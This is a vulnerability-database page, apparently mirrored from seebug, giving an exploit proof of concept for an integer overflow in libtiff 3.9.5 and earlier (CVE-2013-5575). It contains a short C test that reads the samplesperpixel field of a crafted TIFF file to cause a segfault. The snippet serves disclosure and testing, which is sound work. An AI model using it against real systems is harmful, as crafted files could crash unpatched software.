Lucene search
K

libtiff <= 3.9.5 - Integer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

libtiff integer overflow, CVE-2013-5575, sample file po

Related
Code
ReporterTitlePublishedViews
Family
0day.today
libtiff <= 3.9.5 - Integer Overflow Vulnerability
27 Aug 201300:00
zdt
ATTACKERKB
CVE-2013-5575
18 Feb 202619:26
attackerkb
CVE
CVE-2013-5575
26 Sep 201310:00
cve
Cvelist
CVE-2013-5575
26 Sep 201310:00
cvelist
Exploit DB
libtiff 3.9.5 - Integer Overflow
26 Aug 201300:00
exploitdb
exploitpack
libtiff 3.9.5 - Integer Overflow
26 Aug 201300:00
exploitpack
NVD
CVE-2013-5575
26 Sep 201314:16
nvd
Prion
Design/Logic Flaw
26 Sep 201314:16
prion
UbuntuCve
CVE-2013-5575
26 Sep 201314:16
ubuntucve

                                                # Exploit Title: libtiff &#60;= 3.9.5 Integer overflow bug poc
# Date: 2013/08/25
# Exploit Author: x90c
# Vendor Homepage: http://www.remotesensing.org/libtiff
# Version:
- libtiff 3.9.5 &#60;=
# Tested on:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0 (safe)
- libtiff 3.9.5 (vulnerable) &#60;=
- libtiff 3.6.0
# CVE : CVE-2013-5575

I submit the poc of libtiff bug and
attached original advisory too
I want to submit the poc, sample file only

http://www.x90c.org/advisories/xadv_2013001_libtiff.txt


#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;
#include &#60;string.h&#62;
#include &#34;tiffio.h&#34;

int tiff_integer_overflow_test(){
TIFF* tif = TIFFOpen(&#34;/home/x90c/sample_spp.tif&#34;, &#34;r&#34;);
int samples = 0;

/*
 * for instance, TIFFGetField library function will
 * called with malicious samplesperpixel field value 
 * TIFFGetField got segfault!
 */
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);

printf(&#34;tiff_poc: tif samplesperpixel field=%d\n&#34;, samples);
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
25